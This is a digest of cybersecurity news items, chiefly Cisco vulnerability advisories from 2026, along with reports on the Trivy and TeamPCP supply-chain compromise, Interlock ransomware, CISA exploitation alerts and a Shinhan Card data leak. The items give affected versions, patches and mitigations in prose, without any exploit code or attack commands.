Critical SSRF Vulnerability in Cisco Unified CM Exploited via Public PoC A proof-of-concept (PoC) exploit has been released for a critical server-side request forgery (SSRF) vulnerability in Cisco Unified Communications Manager (Unified CM) and Unified CM Session Management Edition (Unified CM SME), tracked as CVE-2026-20230. The flaw, rated 8.6 (High) on the CVSS v3.1 scale but classified as Critical by Cisco due to its potential for root-level privilege escalation, exposes vulnerable systems to remote exploitation. The vulnerability arises from improper input validation in HTTP requests (CWE-918), allowing unauthenticated attackers to interact with internal services. By sending crafted HTTP requests, threat actors can perform SSRF attacks and write arbitrary files to the underlying OS, enabling privilege escalation and potential full system compromise. Exploitation is only possible if the Cisco WebDialer service disabled by default but active in some deployments is enabled. The public release of the PoC exploit heightens the risk, as it provides attackers with a functional attack method. Security researchers confirm the exploit demonstrates SSRF-based file-writing capabilities, which could be used for persistence or further lateral movement, particularly in internet-facing or compromised internal networks. Affected systems include Cisco Unified CM and Unified CM SME with the WebDialer service running. Administrators can check vulnerability status via the Cisco Unified CM Administration interface under Cisco Unified Serviceability > Control Center – Feature Services. If the Cisco WebDialer Web Service is marked as "Started," the system is exposed. Cisco has released software updates to patch the flaw, with no official workarounds available. As a temporary mitigation, disabling the WebDialer service is recommended. Additional defensive measures include restricting access to management interfaces and monitoring for suspicious outbound HTTP requests or unauthorized file creation. While no active compromises have been reported, organizations are urged to prioritize patching due to the high risk of exploitation and the potential for root-level access. The vulnerability underscores the urgency of securing enterprise communication systems against SSRF-based attacks.

Third-Party Risk Management Gaps Exposed as AI-Driven Threats Escalate Organizations are pouring resources into third-party risk management, yet breaches, delays, and blind spots persist revealing a stark disconnect between perceived and actual program effectiveness. A recent analysis highlights how attackers are leveraging AI to scale threats, from generating malware to bypassing security checks, while security teams struggle to keep pace with machine-speed attacks. Key challenges include unmonitored generative AI use ("Shadow AI") within business units, slow assessment timelines, and manual bottlenecks that create hidden risks. Even mature programs face vulnerabilities, particularly as fourth-party exposure extends beyond traditional third-party oversight. Meanwhile, enterprises rushing AI projects into production are often forced into reactive security postures, leaving critical gaps unaddressed. Industry responses are emerging: IBM and Red Hat have committed $5 billion to secure open-source supply chains under Project Lightwell, while startups like Offroad ($7M) and Ocean ($28M) are targeting identity and email security risks. CISOs are also grappling with remediation at scale, as AI-driven attacks demand adaptive defenses. Recent incidents underscore the urgency: a Trump campaign mobile data breach, FIFA World Cup phishing schemes, and CISA’s response to supply chain attacks. Meanwhile, vulnerabilities like the Mirasvit flaw in Magento servers and a critical Cisco Unified CM exploit with available proof-of-concept code demonstrate the ongoing threat landscape. As AI reshapes cybersecurity, organizations are urged to align security, continuity, and risk management around critical assets, though persistent visibility gaps and assessment inefficiencies remain hurdles. The shift toward AI-driven defenses is accelerating, but the race to close third-party risk gaps is far from over.

Critical Cisco Secure Workload Vulnerability Exposes Internal APIs to Unauthenticated Attacks Cisco has disclosed a severe security flaw (CVE-2026-20223) in its Secure Workload platform, allowing unauthenticated attackers to gain Site Admin-level privileges via improperly secured internal REST APIs. With a CVSS score of 10.0, the vulnerability stems from missing authentication and insufficient validation in API endpoints, enabling attackers to send crafted requests without credentials. Successful exploitation could grant full control over affected environments, including access to sensitive data, configuration modifications, and cross-tenant risks in shared deployments. The flaw impacts both SaaS and on-premises versions of Cisco Secure Workload Cluster Software, though it does not affect the web-based management interface. Cisco has released patches for affected versions: - 3.10: Fixed in 3.10.8.3 - 4.0: Fixed in 4.0.3.17 - 3.9 and earlier: Require migration to a supported release For SaaS deployments, Cisco has already applied fixes, requiring no customer action. While no active exploitation or public proof-of-concept has been reported, the critical severity and low attack complexity make this a high-priority risk for security teams. The vulnerability was discovered during internal security testing, underscoring the growing threat posed by unsecured internal APIs, which are often overlooked in traditional security assessments. Cisco’s advisory highlights the need for robust authentication and validation across all API layers as attackers increasingly target backend services.

GitHub Confirms Internal Source Code Breach by TeamPCP Threat Actor A cybercriminal group known as TeamPCP has claimed responsibility for breaching GitHub’s internal systems, allegedly stealing proprietary data, including source code from approximately 4,000 private repositories. The threat actor announced the breach via a post on X (formerly Twitter), asserting access to sensitive internal assets tied to GitHub’s core platform. GitHub acknowledged the incident in a public statement, confirming unauthorized access to its internal repositories while emphasizing that customer data remains unaffected. The company is actively investigating the scope and impact of the breach. The incident highlights ongoing risks to software supply chains, as threat actors increasingly target development environments to exploit vulnerabilities or extract intellectual property. No further details on the attack vector or potential motives have been disclosed.

Cisco Warns of Critical Webex Vulnerability Allowing Unauthorized Access Cisco has issued an urgent security advisory regarding a critical vulnerability (CVE-2026-20184) in its Webex communication platform, which could enable remote attackers to impersonate registered users and bypass authentication. The flaw, disclosed on April 15, 2026, stems from improper certificate validation in the platform’s single sign-on (SSO) integration with Cisco Control Hub. With a severity score of 9.8/10, the vulnerability (classified as CWE-295) allows unauthenticated threat actors to exploit misconfigured SSO connections by sending malicious digital tokens. If successful, attackers could gain full access to Webex meetings, files, and private communication channels while appearing as legitimate users making detection difficult for monitoring tools. Cisco has patched its cloud-based Webex infrastructure, but enterprise administrators must take manual steps to secure their environments. Affected organizations are required to generate and upload a new SAML certificate via the Webex Control Hub and verify compliance with updated certificate validation processes. No temporary workarounds exist, and Cisco’s Product Security Incident Response Team (PSIRT) has confirmed no active exploitation or public proof-of-concept attacks at this time. The incident highlights the risks of improper certificate management in cloud-based collaboration tools.

Critical Zero-Day Exploit in Progress: Cisco ASA and FTD Devices Under Active Attack A severe zero-day vulnerability in Cisco’s Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software is being actively exploited in the wild, with threat actors targeting unpatched systems to gain unauthorized access. The flaw, tracked as CVE-2024-20353 (CVSS score: 8.6), allows attackers to execute arbitrary code remotely by sending specially crafted packets to affected devices. Key Details: - Who: Cisco confirmed the vulnerability, attributing exploitation attempts to an unidentified advanced persistent threat (APT) group. Security researchers at Cisco Talos and Rapid7 independently detected the attacks. - What: The flaw stems from improper input validation in the web services interface of ASA and FTD devices, enabling unauthenticated remote code execution (RCE) without user interaction. - When: Exploitation attempts were first observed in late March 2024, with Cisco releasing an advisory and patches on April 24, 2024. Attacks have intensified since the disclosure. - Where: Targets include enterprise networks, government agencies, and critical infrastructure sectors globally, with a concentration in North America and Europe. - Why: While Cisco has not disclosed specific motives, the sophistication of the attacks suggests espionage or pre-positioning for future disruptive operations. Impact: Successful exploitation grants attackers full control over vulnerable devices, potentially leading to lateral movement, data exfiltration, or network disruption. Cisco has urged organizations to apply patches immediately, as proof-of-concept (PoC) exploits are already circulating in underground forums. Unpatched systems remain at high risk, with over 10,000 exposed devices identified via public scans. Cisco has released software updates (ASA 9.18.4.15 and FTD 7.2.5) to mitigate the flaw, alongside temporary workarounds, including disabling web services on affected interfaces. The incident underscores the growing threat of zero-day exploits targeting perimeter security devices.

Critical Cisco IMC Authentication Bypass Flaw Grants Full Admin Access (CVE-2026-20093) Cisco has issued an urgent security advisory for CVE-2026-20093, a 9.8-severity authentication bypass vulnerability in its Integrated Management Controller (IMC) software. The flaw allows unauthenticated remote attackers to overwrite administrative passwords and gain full control over vulnerable Cisco servers and network appliances. The vulnerability stems from improper handling of password change requests in the IMC software. By sending a maliciously crafted HTTP request to the management interface, attackers can alter passwords for any user including Admin accounts without prior authentication. Successful exploitation grants complete administrative privileges over affected systems. Discovered by security researcher "jyh" and reported to Cisco’s Product Security Incident Response Team (PSIRT), the flaw has no known public exploits or active attacks at this time. However, Cisco warns that no workarounds or mitigations exist patching is the only remediation. ### Affected Hardware The vulnerability impacts a range of Cisco devices running vulnerable IMC versions, including: - 5000 Series Enterprise Network Compute Systems (ENCS) - Catalyst 8300 Series Edge uCPE platforms - UCS C-Series M5/M6 Rack Servers and UCS E-Series M3/M6 servers - Preconfigured network appliances exposing the IMC interface, such as: - Application Policy Infrastructure Controller (APIC) servers - Catalyst Center Appliances - Secure Firewall Management Center Appliances - Secure Network Analytics Appliances ### Remediation Cisco has released patched firmware updates for affected devices. Administrators must apply fixes via: - NFVIS upgrade process (for ENCS and uCPE platforms) - Cisco Host Upgrade Utility (HUU) (for UCS servers) - Out-of-band update procedures (for specific appliances) Details on fixed versions are available in Cisco’s official advisory. Given the critical severity and lack of mitigations, immediate patching is essential to prevent unauthorized access.

Cisco Hit by Major Cyberattack Linked to Supply Chain Breach Cisco is responding to a significant cybersecurity incident after threat actors breached its internal development networks, stealing sensitive source code and corporate data. The attack, claimed by the hacking group ShinyHunters, also allegedly impacted Salesforce, Aura, and AWS storage buckets. The breach originated from a supply chain attack involving Trivy, a widely used vulnerability scanner. Attackers exploited a malicious GitHub Action plugin tied to the Trivy compromise, allowing them to steal credentials and infiltrate Cisco’s build environments. Once inside, they compromised dozens of devices, including lab workstations and developer systems, gaining access to highly sensitive data. The stolen material includes AWS keys, which were used to perform unauthorized actions in Cisco’s cloud accounts, and over 300 private GitHub repositories. These repositories contain unreleased product source code, including AI Assistants and AI Defense technologies, as well as data belonging to corporate clients, such as major banks, BPO firms, and U.S. government agencies. Cisco’s security teams including the Unified Intelligence Center, CSIRT, and EOC moved quickly to contain the breach by isolating affected systems, wiping compromised machines, and enforcing a mass credential reset. However, the company has not yet issued a public statement, and internal sources suggest ongoing complications from the incident. While ShinyHunters has taken credit for the data theft, security researchers link the underlying Trivy supply chain attack to TeamPCP, a separate group known for deploying custom malware ("TeamPCP Cloud Stealer") to hijack developer platforms like Docker, NPM, and PyPi. TeamPCP has also been tied to recent breaches of LiteLLM and Checkmarx, raising concerns about secondary attacks stemming from related vulnerabilities.

Supply Chain Attack on Trivy Expands into Lapsus$-Linked Extortion Campaign, Compromising Over 1,000 SaaS Environments A sophisticated supply chain attack targeting Trivy, a widely used open-source security scanner, has escalated into a large-scale extortion campaign linked to the cybercriminal group Lapsus$, compromising over 1,000 enterprise SaaS environments. The attack, first detected in late February, involved the compromise of Trivy’s VS Code extension, GitHub Action, and Docker Hub artifacts, with malicious payloads distributed through manipulated version tags and cached mirror infrastructure. The threat actors, initially identified as the cloud-native group TeamPCP, gained persistent access to Aqua Security’s GitHub organization, defacing all 44 repositories with the message “TeamPCP Owns Aqua Security.” Mandiant’s investigation revealed that the attackers later funneled stolen access to broader criminal networks, including Lapsus$, known for aggressive extortion tactics. The attack leveraged stolen credentials likely obtained through a third-party breach to backdoor multiple components, including LiteLLM, an AI middleware library embedded in cloud environments. Security firms Wiz and Socket confirmed that the campaign expanded across the npm ecosystem, with over 29 malicious packages distributed using compromised publish tokens. Despite takedown efforts, cached copies of the malicious Trivy artifacts continued circulating via mirror infrastructure like mirror.gcr.io. Security experts warned that the attackers timed their escalation strategically, waiting until defenders were distracted by RSA Conference 2026 before launching follow-on attacks. Cory Michal (AppOmni) and Isaac Evans (Semgrep) emphasized that the incident highlights critical weaknesses in third-party code governance, with attackers exploiting implicit trust in supply chains and mutable version tags to scale their reach. Aqua Security confirmed that its commercial products remain unaffected due to architectural isolation, but credential revocation and rotation efforts are ongoing. Mandiant has yet to determine the initial source of the stolen credentials, suspecting a breach at a business process outsourcer or partner organization. As the fallout continues, the attackers have publicly signaled plans to target additional open-source projects, with security researchers warning that the 1,000+ downstream victims could expand significantly in the coming months. The incident underscores the growing threat of supply chain attacks, where a single compromise can cascade across thousands of organizations.

Cisco Patches High-Severity Privilege Escalation Flaws in IOS XR Software Cisco has released high-severity software updates to address two critical privilege escalation vulnerabilities in its IOS XR Software, which could allow authenticated, local attackers to gain root-level access or full administrative control over affected devices. Given the role of these routers in enterprise networks, the flaws pose a significant security risk. ### Vulnerability Details Both vulnerabilities are rated High severity (CVSS 8.8/10) and can be exploited independently: 1. CVE-2026-20040 – A CLI privilege escalation flaw caused by improper validation of user-supplied arguments in certain commands. A low-privileged attacker could execute arbitrary commands as root on the underlying OS. 2. CVE-2026-20046 – A CLI privilege escalation issue in Cisco IOS XRv 9000 Routers, stemming from incorrect command-to-task-group mapping. Attackers could bypass security checks to perform unauthorized administrative actions. Cisco confirmed that IOS, IOS XE, and NX-OS Software are not affected by these flaws. ### Mitigation & Patching Cisco urges administrators to upgrade to fixed software versions (e.g., 25.2.21, 25.4.2) or apply Software Maintenance Updates (SMUs). For CVE-2026-20040, patching is mandatory, as no workarounds exist. For CVE-2026-20046, organizations using TACACS+ AAA command authorization can restrict unauthorized command access as a temporary measure. Systems running older versions (25.1 or earlier, 25.3 branch) are particularly vulnerable and should migrate to patched releases immediately.

Cyber Retaliation Likely as U.S.-Israeli Strikes Trigger Iranian Digital Disruptions On March 1, 2026, a series of cyber operations unfolded alongside joint U.S.-Israeli airstrikes targeting Iran, signaling potential escalation in digital warfare. Cybersecurity experts reported multiple breaches, including the hack of BadeSaba, a widely used Iranian religious app with over 5 million downloads. The app displayed messages urging armed forces to disarm and join civilians, while other compromised news websites broadcast similar calls for accountability. Internet connectivity in Iran experienced sharp drops at 0706 GMT and 1147 GMT, according to Doug Madory of Kentik, with only minimal service remaining. The Jerusalem Post reported cyberattacks on Iranian government and military systems, though Reuters could not independently verify these claims. Security researchers noted the strategic targeting of BadeSaba, as its user base primarily religious and pro-government made it a high-impact platform for psychological operations. Cybersecurity firms warned of impending retaliation, with Sophos’ Rafe Pilling highlighting potential tactics, including amplified data breaches, unsophisticated industrial system compromises, and direct offensive cyber operations. Pro-Iranian hacktivist groups, known for past hack-and-leak campaigns, ransomware, and DDoS attacks, have already issued calls to action, per Halcyon’s Cynthia Kaiser. CrowdStrike observed reconnaissance and DDoS activity from Iranian-aligned actors, while Anomali reported state-backed Iranian groups deploying "wiper" attacks against Israeli targets ahead of the strikes. Despite Iran’s reputation as a cyber threat alongside Russia and China, its past responses to physical attacks have been limited. Following U.S. strikes on Iranian nuclear sites in June, cyber retaliation was minimal, with only a brief disruption in Albania’s capital, Tirana. However, the current escalation suggests a shift toward more aggressive digital countermeasures.

Critical Cisco Secure Firewall Flaw Grants Unauthenticated Root Access (CVE-2026-20079) Cisco has disclosed a critical vulnerability (CVE-2026-20079) in its Secure Firewall Management Center (FMC) Software, allowing unauthenticated remote attackers to gain full root access to affected devices. With a CVSS score of 10.0, the flaw poses a severe risk to enterprise network security. The vulnerability was discovered during internal testing by Cisco researcher Brandon Sakai and stems from an improperly initialized system process during the device’s boot sequence. Attackers can exploit it by sending crafted HTTP requests to the FMC web interface, bypassing authentication entirely. Successful exploitation enables threat actors to execute malicious scripts, alter security policies, monitor network traffic, and pivot deeper into corporate systems. This flaw exclusively affects on-premises deployments of Cisco Secure FMC Software, regardless of configuration. No workarounds or mitigations exist, leaving unpatched systems highly vulnerable. Cloud-delivered FMC (cdFMC), Secure Firewall ASA, FTD Software, and Security Cloud Control remain unaffected. As of March 2026, Cisco’s Product Security Incident Response Team (PSIRT) reports no evidence of active exploitation in the wild. However, organizations must immediately upgrade to a patched software release to prevent potential breaches. Cisco provides a Software Checker tool to help administrators identify vulnerable versions and apply fixes. The flaw underscores the critical importance of timely patch management for firewall infrastructure.

Critical Cisco SD-WAN Vulnerability Exploited by Sophisticated Threat Actor Australia’s Cyber Security Centre (ACSC), alongside its Five Eyes partners, has issued an emergency directive warning of a severe authentication bypass vulnerability in Cisco’s SD-WAN systems. Tracked as CVE-2026-20127 (disclosed on 25 February), the flaw carries a perfect CVSS score of 10 and affects the Cisco Catalyst SD-WAN Controller and SD-WAN Manager. If exploited, the vulnerability allows remote attackers to bypass authentication and gain administrative privileges, enabling them to manipulate network configurations via NETCONF. The ACSC confirmed global exploitation, with threat actors adding rogue peers to establish long-term persistence and escalate to root access in compromised SD-WAN environments. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) emphasized the urgency of mitigation, despite an ongoing government shutdown. Acting Director Dr. Madhu Gottumukkala warned that the flaw’s ease of exploitation demands immediate action, particularly for federal agencies. Cisco’s threat intelligence unit, Talos, attributed the activity to UAT-8616, a highly sophisticated actor with operations dating back to at least 2023. The group reportedly exploited CVE-2022-20775 via a software version downgrade to escalate privileges before restoring the original version, evading detection. Rapid7’s Douglas McKee noted the actor’s stealthy, targeted approach, which allows persistence in high-value infrastructure without triggering broad alarms. CISA and partners recommend immediate patching, device inventory checks, forensic snapshots, and full system rebuilds as Cisco advises that patching alone may be insufficient to remove existing intrusions. WatchTowr’s Ryan Dewhurst stressed the need for organizations to hunt for prior compromise, given the actor’s ability to maintain undetected access.

Cisco Patches High-Severity Vulnerability in Meeting Management Software Cisco has released a high-severity security advisory addressing a critical flaw in Cisco Meeting Management (CMM) that could enable authenticated remote attackers to upload arbitrary files and execute commands with root privileges. Tracked as CVE-2026-20098, the vulnerability carries a CVSS score of 8.8, reflecting its severe impact on system confidentiality, integrity, and availability. The flaw stems from improper input validation in the web-based management interface’s Certificate Management component. An attacker with valid credentials specifically, video operator privileges or higher could exploit the weakness by sending a crafted HTTP request, bypassing file sanitization and path validation. Successful exploitation allows the attacker to upload malicious files to system paths processed under the root account, enabling arbitrary command execution, system file modification, or full system compromise. Affected versions include Cisco Meeting Management 3.12 and earlier, with the fix available in version 3.12.1 MR. Cisco has stated that no workarounds or configuration changes can mitigate the risk, making immediate patching the only effective remediation. The company also advises restricting access to the CMM web interface to trusted networks and enforcing strong authentication measures. The vulnerability was responsibly disclosed by the NATO Cyber Security Centre Penetration Testing Team, and Cisco reports no evidence of active exploitation in the wild. Given the potential for root-level access, organizations using affected versions are urged to apply the update without delay.

Interlock Ransomware Exploited Zero-Day in Cisco Firewall Before Patch Ransomware group Interlock exploited a maximum-severity zero-day vulnerability (CVE-2026-20131) in Cisco Secure Firewall Management Center more than a month before the vendor released a patch. The flaw, allowing unauthenticated remote attackers to execute arbitrary Java code as root, was actively abused starting January 26, while Cisco issued fixes on March 4. Amazon’s CJ Moses, CISO of Amazon Integrated Security, revealed the timeline, stating that the company’s MadPot honeypot network detected exploit traffic tied to Interlock’s infrastructure. A misconfigured server also exposed the group’s attack toolkit, providing defenders with critical intelligence. ### Interlock’s Tactics and Toolkit Interlock, a ransomware crew active since 2025, has targeted hospitals, medical facilities, and government entities, disrupting critical services including chemotherapy sessions and pre-surgery appointments and leaking sensitive data. Victims include Davita (kidney dialysis), Kettering Health, and the city of Saint Paul, Minnesota, where a 43 GB data breach forced a state of emergency. The group’s post-exploitation toolkit includes: - A PowerShell script harvesting system details (OS, hardware, services, software, storage, VM inventory, user files, RDP logs, and browser data). - Custom remote access trojans (RATs) in JavaScript and Java, providing persistent access, command execution, file transfer, and SOCKS5 proxy capabilities. - A Bash script configuring Linux servers as reverse proxies, wiping logs, and ensuring persistence. - Memory-resident backdoors and lightweight network beacons to evade detection. - Legitimate tools like ConnectWise ScreenConnect, Volatility, and Certify to blend malicious activity with authorized remote access. ### Redundant Access and Extortion Tactics Interlock deploys multiple backdoors including dual-language implants (JavaScript and Java) to maintain access even if one is detected. Their ransom notes threaten regulatory exposure, leveraging compliance violations alongside data encryption and leaks to pressure victims. Cisco has updated its security advisory, urging customers to apply patches immediately. The incident underscores the growing sophistication of ransomware groups in exploiting zero-days before public disclosure.

CISA Warns of Actively Exploited Zimbra and SharePoint Vulnerabilities The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an alert urging federal agencies to patch two critical vulnerabilities CVE-2025-66376 (CVSS 7.2) in Synacor Zimbra Collaboration Suite (ZCS) and CVE-2026-20963 (CVSS 8.8) in Microsoft Office SharePoint after confirming active exploitation in the wild. ### Zimbra XSS Flaw Exploited in Targeted Cyberespionage The Zimbra vulnerability (CVE-2025-66376), a stored cross-site scripting (XSS) flaw in the Classic UI, was patched in November 2025 (versions 10.0.18 and 10.1.13). However, a suspected Russian state-sponsored threat group has been exploiting it in Operation GhostMail, a campaign targeting Ukraine’s State Hydrographic Service (hydro.gov[.]ua). The attack leverages a socially engineered internship inquiry email, sent on January 22, 2026, from a compromised account at the National Academy of Internal Affairs. The email contains obfuscated JavaScript embedded in its HTML body, which executes when opened in a vulnerable Zimbra webmail session. Unlike traditional phishing, this attack requires no malicious attachments, links, or macros only interaction with the email itself. The malware harvests credentials, session tokens, 2FA backup codes, browser-saved passwords, and 90 days of email data, exfiltrating it via DNS and HTTPS. Seqrite Labs, which uncovered the campaign, noted that this technique aligns with previous Russian operations like Operation RoundPress, which also exploited XSS flaws in webmail software. ### SharePoint Deserialization Flaw Under Active Attack The second vulnerability, CVE-2026-20963, affects Microsoft Office SharePoint and allows remote code execution (RCE) via deserialization of untrusted data. While no public reports detail its exploitation, CISA’s inclusion in the Known Exploited Vulnerabilities (KEV) catalog confirms its use in attacks. Federal agencies must patch it by March 23, 2026. ### Broader Threat Landscape: Edge Device Exploits The advisory follows Amazon’s disclosure that Interlock ransomware operators exploited a maximum-severity Cisco firewall flaw (CVE-2026-20131, CVSS 10.0) as a zero-day since January 26, 2026, weeks before public disclosure. The group has historically targeted education, healthcare, manufacturing, and government sectors, where operational disruption maximizes ransom pressure. CISA added CVE-2026-20131 to its KEV catalog on March 19, 2026, mandating federal agencies to patch by March 22, 2026. The agency also issued an emergency directive for Cisco Catalyst SD-WAN vulnerabilities (CVE-2026-20127, CVE-2022-20775, CVE-2026-20122, CVE-2026-20128), which have been actively exploited, requiring agencies to submit logs by March 23, 2026. VulnCheck further warned that CVE-2026-20133, another Catalyst SD-WAN flaw, could enable privilege escalation to root by leaking the `vmanage-admin` private key and `confd_ipc_secret`. The firm cautioned that early exploit research may not capture all attack vectors, emphasizing the need for comprehensive patching. Federal agencies must apply fixes for CVE-2025-66376 by April 1, 2026, and for CVE-2026-20963 by March 23, 2026.

Critical Zero-Day in Cisco Unified Communications Exploited in the Wild Cisco has disclosed CVE-2026-20045, a critical zero-day remote code execution (RCE) vulnerability actively exploited in attacks targeting its Unified Communications (UC) products. The flaw allows unauthenticated attackers to execute arbitrary commands on the underlying operating system, potentially escalating to root-level access. The vulnerability stems from improper input validation in HTTP requests to the web-based management interface. Attackers can bypass authentication by sending crafted requests, initially executing commands at the user level before escalating privileges. Cisco rated the flaw Critical under its Security Impact Rating (SIR), emphasizing the severity of root-level compromise. ### Affected Products The vulnerability impacts the following Cisco products, regardless of configuration: - Unified Communications Manager (Unified CM) - Unified CM Session Management Edition (SME) - Unified CM IM & Presence Service (IM&P) - Unity Connection - Webex Calling Dedicated Instance Other products, including Contact Center SIP Proxy and Unified CCE, are confirmed unaffected. A full list is available in Cisco’s advisory. ### Exploitation & Risk Cisco’s Product Security Incident Response Team (PSIRT) confirmed real-world exploitation, with attackers likely using automated scanners to target exposed management interfaces. Enterprises running vulnerable VoIP and UC deployments particularly in hybrid work environments face heightened risk, as exploitation only requires network access to the management interface, often exposed via firewalls or VPNs. No workarounds exist, and Cisco has released patches and fixed releases for affected versions. Organizations must migrate or apply version-specific updates immediately. Key fixed releases include: - Unified CM, IM&P, SME, Webex Calling: 14SU5, 14SU4a patch, or 15SU4 (March 2026) - Unity Connection: 14SU5, 14SU4 patch, or 15SU4 (March 2026) The Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2026-20045 to its Known Exploited Vulnerabilities Catalog, underscoring the urgency of remediation. ### Mitigation & Detection Cisco recommends: - Applying patches immediately (no workarounds available). - Restricting management interface access to trusted IP addresses via firewalls. - Monitoring logs for anomalous HTTP requests. The flaw was reported by an external researcher, whom Cisco credited in its advisory. The incident highlights the growing risks to UC platforms amid rising RCE exploitation trends.

Cisco Patches Medium-Severity Flaws in ISE and Snort 3, Including Exploitable XML Vulnerability Cisco has released security updates to address three medium-severity vulnerabilities, including one with a public proof-of-concept (PoC) exploit. The most notable flaw, CVE-2026-20029 (CVSS 4.9), affects Cisco Identity Services Engine (ISE) and ISE Passive Identity Connector (ISE-PIC), allowing authenticated attackers with administrative privileges to access sensitive files on the underlying OS. The vulnerability stems from improper XML parsing in the web-based management interface. An attacker could exploit it by uploading a malicious file, potentially reading restricted system files. Bobby Gould of Trend Micro Zero Day Initiative reported the issue, which impacts: - ISE/ISE-PIC versions prior to 3.2 (users must migrate to a fixed release) - 3.2 (patch with 3.2 Patch 8) - 3.3 (patch with 3.3 Patch 8) - 3.4 (patch with 3.4 Patch 4) - 3.5 (not vulnerable) Cisco confirmed the availability of a PoC exploit but reported no active exploitation in the wild. No workarounds exist, making updates the only mitigation. Additionally, Cisco patched two Snort 3-related flaws in its Secure Firewall Threat Defense (FTD) Software, IOS XE Software, and Meraki software: - CVE-2026-20026 (CVSS 5.8): A denial-of-service (DoS) vulnerability in Snort 3’s DCE/RPC processing, allowing unauthenticated attackers to crash the detection engine. - CVE-2026-20027 (CVSS 5.3): An information disclosure bug in the same component, enabling data leaks. Guy Lederfein of Trend Micro reported these issues, which require Snort 3 to be configured for exploitation. Cisco has released fixes for all affected products.

Cisco Patches High-Severity DoS Vulnerability in Network Management Tools Cisco has disclosed a critical vulnerability (CVE-2026-20188, CVSS 7.5) affecting its Crosswork Network Controller (CNC) and Network Services Orchestrator (NSO), which could allow unauthenticated, remote attackers to trigger a Denial-of-Service (DoS) condition. The flaw stems from uncontrolled resource consumption (CWE-400), where affected systems fail to enforce rate-limiting on incoming connections. Attackers can exploit this by flooding a server with excessive requests, exhausting available resources and rendering the system unresponsive. Recovery requires a manual reboot, disrupting network operations and locking out administrators. ### Affected Versions & Fixes - Cisco Crosswork Network Controller (CNC): - Vulnerable: Version 7.1 and earlier - Fixed: Version 7.2 (unaffected) - Cisco Network Services Orchestrator (NSO): - Vulnerable: Versions 6.3 and earlier, 6.4 (up to 6.4.1.2) - Fixed: 6.4.1.3 and later; 6.5+ (unaffected) Cisco discovered the issue internally (Bug ID CSCwr08237) while resolving a support case. While no active exploitation or public PoC exploits have been observed, the company warns that no workarounds exist upgrading to patched versions is the only mitigation. Organizations using vulnerable deployments are advised to apply updates immediately to prevent potential service disruptions.

Critical Cisco SSM On-Prem Vulnerability Grants Root Access to Attackers Cisco has disclosed a critical unauthenticated remote code execution (RCE) vulnerability in its Smart Software Manager On-Prem (SSM On-Prem) platform, tracked as CVE-2026-20160 with a CVSS score of 9.8. The flaw allows unauthenticated, remote attackers to execute arbitrary commands with root privileges, granting full control over affected systems. The vulnerability stems from an exposed internal service in SSM On-Prem, which can be exploited via specially crafted HTTP requests to the platform’s API without requiring authentication or user interaction. Given its severity, the flaw is highly attractive for automated, large-scale attacks. A successful exploit could enable threat actors to pivot laterally across networks, exfiltrate sensitive data, or deploy ransomware and other malicious payloads. Cisco SSM On-Prem is widely used for enterprise license management, meaning a compromise could have severe implications for core infrastructure. Cisco’s Product Security Incident Response Team (PSIRT) identified the issue internally while addressing a support case. As of the advisory’s release, no active exploitation has been observed, but the lack of authentication requirements and the flaw’s critical severity heighten the risk of imminent attacks. Affected Versions: - Vulnerable: SSM On-Prem releases 9-202502 through 9-202510 - Fixed: SSM On-Prem version 9-202601 - Not affected: Releases before 9-202502, Cisco Smart Licensing Utility, and SSM satellite products Cisco has confirmed that no workarounds or mitigations exist the only remediation is applying the official patch. Organizations running affected versions are urged to prioritize upgrades to prevent potential enterprise-wide compromise.

Critical Cisco Secure Email Gateway Vulnerability Exploited in Ongoing Attacks Cisco has disclosed an active cyberattack campaign targeting vulnerabilities in its Cisco Secure Email Gateway and Cisco Secure Email and Web Manager appliances running Cisco AsyncOS Software. The flaw, tracked as CVE-2025-20393 (CVSS 10.0), allows threat actors to execute arbitrary commands with root privileges, enabling full system compromise. The vulnerability affects both physical and virtual instances of the appliances when the Spam Quarantine feature is enabled and exposed to the internet—a configuration not enabled by default per Cisco’s deployment guidelines. Cisco Secure Email Cloud remains unaffected, and there is no evidence of exploitation targeting Cisco Secure Web. ### Attack Details & Timeline The campaign was first detected through a Cisco Technical Assistance Center (TAC) case, with Cisco Talos confirming active exploitation. Attackers exploited exposed ports to gain unauthorized root access, disable security tools, and establish persistence mechanisms for long-term control. Compromised appliances may require a full rebuild to remove embedded threats. ### Mitigation & Hardening Measures Cisco has stated that no direct workarounds exist for CVE-2025-20393. Organizations are advised to: - Restrict appliance access to trusted hosts and avoid direct internet exposure. - Deploy behind firewalls, filtering traffic to allow only authorized communication. - Separate mail and management interfaces to limit internal access risks. - Monitor web logs and forward them to external servers for analysis. - Disable unnecessary services (HTTP, FTP) and enforce SSL/TLS with trusted certificates. - Upgrade to the latest AsyncOS release and implement strong authentication (SAML, LDAP). ### Broader Impact The incident highlights risks posed by misconfigured network services, emphasizing the need for immediate exposure assessment, access restrictions, and continuous monitoring. Organizations should consult Cisco TAC if compromise is suspected.

Shinhan Card Reports Data Breach Affecting 190,000 Merchant Representatives Shinhan Card disclosed a data breach involving approximately 192,088 records of merchant representatives, marking the latest in a series of recent leaks affecting major South Korean firms, including Coupang, KT, SK Telecom, and Lotte Card. The incident, reported to the Personal Information Protection Commission (PIPC) on Tuesday, was attributed to internal employee misconduct related to new card solicitation rather than external hacking. The exposed data included: - 181,585 records containing only mobile phone numbers - 8,120 records with phone numbers and names - 2,310 records with phone numbers, names, birth years, and gender - 73 records with phone numbers, names, and full dates of birth Shinhan Card confirmed that no highly sensitive information—such as resident registration numbers, card details, or bank accounts—was compromised. The breach was limited to merchant representatives, with no impact on individual cardholders. The company stated that the leak stemmed from isolated employee actions and posed no further dissemination risk. The case came to light after a whistleblower submitted evidence to the PIPC, prompting an investigation. Shinhan Card began reviewing the allegations on November 13, verifying the breach through internal records. Following the findings, the company issued a public apology, notified affected merchants, and launched a webpage for individuals to check their exposure. While Shinhan Card has taken measures equivalent to those for a data breach, further review is needed to classify the incident officially. The company pledged to strengthen protections to prevent future occurrences. Security Investment Trends Lag Despite Rising Breaches A recent survey by market tracker Leaders Index revealed that while major South Korean firms increased IT spending by 31.2% (from 16.5 trillion won in 2022 to 21.6 trillion won in 2024), information security investment grew only marginally in proportion—from 5.8% to 5.9% of total IT budgets. Security staffing saw a similar trend, with dedicated personnel rising 22.3% but remaining at just 6.7% of IT workforce share. Analysts noted that despite absolute increases, security priorities continue to trail broader technology spending.

